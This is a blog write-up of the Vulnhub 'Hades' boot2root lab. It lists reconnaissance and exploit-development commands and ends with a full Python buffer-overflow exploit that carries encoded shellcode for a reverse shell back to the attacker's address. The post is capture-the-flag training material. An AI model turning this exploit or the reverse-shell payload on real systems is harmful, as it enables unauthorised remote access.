About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!
Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases.
If you want to tackle Hades yourself, you can grab a copy of the machine here.
Enjoy
Commands Used
# Host Discovery netdiscover -r 10.0.0.0/24 # Service Enumeration nmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129 # Base64 Decryption base64 -d ssh-hades > hades.bin # Pattern Creation /opt/metasploit-framework/tools/pattern_create 1000 # Offset Search /opt/metasploit-framework/tools/pattern_offset.rb Af7A /opt/metasploit-framework/tools/pattern_offset.rb 5Af6 /opt/metasploit-framework/tools/pattern_offset.rb 0x34654133 # Finding Assembly Shellcode /opt/metasploit-framework/tools/metasm_shell.rb metasm> jmp $esp+80 # Reverse Shell Payload msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python # Improved Shell python -c "import pty; pty.spawn('/bin/sh')" # File Decryption openssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file
Finished Exploit – Hades
#!/usr/bin/env python import socket, struct target = '10.0.0.129' port = 65535 # Shellcode # msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python # [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1) buf = "" buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x2b" buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x20" buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x34" buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\xb6" buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x57" buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x43" buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\xb6" buf += "\xf8\x78\x10\xb8" # Buffer #buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B' buffer = '\x90'*11 buffer += buf buffer += '\x90'*(131-95-11) buffer += '\xeb\x4e\x90\x90' # esp - 0x2c buffer += 'F'*(167-4-131) buffer += 'B'*4 # ebp buffer += struct.pack("<L",0x08048694) # eip buffer += 'D'*(1000-4-4-167) # Connect and send payload s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) s.send(buffer) data = s.recv(1024) s.close()